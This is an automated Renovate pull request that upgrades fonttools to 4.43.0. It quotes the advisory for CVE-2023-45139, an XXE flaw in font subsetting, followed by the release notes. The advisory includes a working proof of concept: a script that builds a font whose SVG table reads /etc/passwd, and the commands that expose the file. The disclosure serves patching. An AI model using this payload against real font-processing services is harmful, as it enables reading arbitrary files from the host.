Update dependency fonttools to v4.43.0 [SECURITY]

[renovate]

This PR contains the following updates:

Package	Change	Age	Adoption	Passing	Confidence
fonttools	==4.40.0 -> ==4.43.0

GitHub Vulnerability Alerts

CVE-2023-45139

Summary

As of fonttools>=4.28.2 the subsetting module has a XML External Entity Injection (XXE) vulnerability which allows an attacker to resolve arbitrary entities when a candidate font (OT-SVG fonts), which contains a SVG table, is parsed.

This allows attackers to include arbitrary files from the filesystem fontTools is running on or make web requests from the host system.

PoC

The vulnerability can be reproduced following the bellow steps on a unix based system.

1. Build a OT-SVG font which includes a external entity in the SVG table which resolves a local file. In our testing we utilised /etc/passwd for our POC file to include and modified an existing subset integration test to build the POC font - see bellow.

from string import ascii_letters
from fontTools.fontBuilder import FontBuilder
from fontTools.pens.ttGlyphPen import TTGlyphPen
from fontTools.ttLib import newTable

XXE_SVG = """\
<?xml version="1.0"?>
<!DOCTYPE svg [<!ENTITY test SYSTEM 'file:///etc/passwd'>]>
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
  <g id="glyph1">
    <text font-size="10" x="0" y="10">&test;</text>
  </g>
</svg>
"""

def main():
    # generate a random TTF font with an SVG table
    glyph_order = [".notdef"] + list(ascii_letters)
    pen = TTGlyphPen(glyphSet=None)
    pen.moveTo((0, 0))
    pen.lineTo((0, 500))
    pen.lineTo((500, 500))
    pen.lineTo((500, 0))
    pen.closePath()
    glyph = pen.glyph()
    glyphs = {g: glyph for g in glyph_order}

    fb = FontBuilder(unitsPerEm=1024, isTTF=True)
    fb.setupGlyphOrder(glyph_order)
    fb.setupCharacterMap({ord(c): c for c in ascii_letters})
    fb.setupGlyf(glyphs)
    fb.setupHorizontalMetrics({g: (500, 0) for g in glyph_order})
    fb.setupHorizontalHeader()
    fb.setupOS2()
    fb.setupPost()
    fb.setupNameTable({"familyName": "TestSVG", "styleName": "Regular"})

    svg_table = newTable("SVG ")
    svg_table.docList = [
       (XXE_SVG, 1, 12)
    ]
    fb.font["SVG "] = svg_table

    fb.font.save('poc-payload.ttf')

if __name__ == '__main__':
    main()

2. Subset the font with an affected version of fontTools - we tested on fonttools==4.42.1 and fonttools==4.28.2 - using the following flags (which just ensure the malicious glyph is mapped by the font and not discard in the subsetting process):

pyftsubset poc-payload.ttf --output-file="poc-payload.subset.ttf" --unicodes="*" --ignore-missing-glyphs

3. Read the parsed SVG table in the subsetted font:

ttx -t SVG poc-payload.subset.ttf && cat poc-payload.subset.ttx

Observed the included contents of the /etc/passwd file.

Impact

Note the final severity is dependant on the environment fontTools is running in.

• The vulnerability has the most impact on consumers of fontTools who leverage the subsetting utility to subset untrusted OT-SVG fonts where the vulnerability may be exploited to read arbitrary files from the filesystem of the host fonttools is running on

Possible Mitigations

There may be other ways to mitigate the issue, but some suggestions:

1. Set the resolve_entities=False flag on parsing methods
2. Consider further methods of disallowing doctype declarations
3. Consider recursive regex matching

---

Release Notes

fonttools/fonttools (fonttools)

v4.43.0

Compare Source

• [subset] Set up lxml XMLParser(resolve_entities=False) when parsing OT-SVG documents to prevent XML External Entity (XXE) attacks (9f61271): https://codeql.github.com/codeql-query-help/python/py-xxe/
• [varLib.iup] Added workaround for a Cython bug in iup_delta_optimize that was leading to IUP tolerance being incorrectly initialised, resulting in sub-optimal deltas (6012643, cython/cython#5732).
• [varLib] Added new command-line entry point fonttools varLib.avar to add an avar table to an existing VF from axes mappings in a .designspace file (0a3360e).
• [instancer] Fixed bug whereby no longer used variation regions were not correctly pruned after VarData optimization (#​3268).
• Added support for Python 3.12 (#​3283).

v4.42.1

Compare Source

• [t1Lib] Fixed several Type 1 issues (#​3238, #​3240).
• [otBase/packer] Allow sharing tables reached by different offset sizes (#​3241, #​3236, 457f11c).
• [varLib/merger] Fix Cursive attachment merging error when all anchors are NULL (#​3248, #​3247).
• [ttLib] Fixed warning when calling addMultilingualName and ttFont parameter was not passed on to findMultilingualName (#​3253).

v4.42.0

Compare Source

• [varLib] Use sentinel value 0xFFFF to mark a glyph advance in hmtx/vmtx as non participating, allowing sparse masters to contain glyphs for variation purposes other than {H,V}VAR (#​3235).
• [varLib/cff] Treat empty glyphs in non-default masters as missing, thus not participating in CFF2 delta computation, similarly to how varLib already treats them for gvar (#​3234).
• Added varLib.avarPlanner script to deduce 'correct' avar v1 axis mappings based on glyph average weights (#​3223).

v4.41.1

Compare Source

• [subset] Fixed perf regression in v4.41.0 by making NameRecordVisitor only visit tables that do contain nameID references (#​3213, #​3214).
• [varLib.instancer] Support instancing fonts containing null ConditionSet offsets in FeatureVariationRecords (#​3211, #​3212).
• [statisticsPen] Report font glyph-average weight/width and font-wide slant.
• [fontBuilder] Fixed head.created date incorrectly set to 0 instead of the current timestamp, regression introduced in v4.40.0 (#​3210).
• [varLib.merger] Support sparse CursivePos masters (#​3209).

v4.41.0

Compare Source

• [fontBuilder] Fixed bug in setupOS2 with default panose attribute incorrectly being set to a dict instead of a Panose object (#​3201).
• [name] Added method to removeUnusedNameRecords in the user range (#​3185).
• [varLib.instancer] Fixed issue with L4 instancing (moving default) (#​3179).
• [cffLib] Use latin1 so we can roundtrip non-ASCII in {Full,Font,Family}Name (#​3202).
• [designspaceLib] Mark as optional in docs (as it is in the code).
• [glyf-1] Fixed drawPoints() bug whereby last cubic segment becomes quadratic (#​3189, #​3190).
• [fontBuilder] Propagate the 'hidden' flag to the fvar Axis instance (#​3184).
• [fontBuilder] Update setupAvar() to also support avar 2, fixing _add_avar() call site (#​3183).
• Added new voltLib.voltToFea submodule (originally Tiro Typeworks' "Volto") for converting VOLT OpenType Layout sources to FEA format (#​3164).

---

Configuration

📅 Schedule: Branch creation - "" (UTC), Automerge - At any time (no schedule defined).

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

♻ Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.

---

• If you want to rebase/retry this PR, check this box

---

This PR was generated by Mend Renovate. View the repository job log.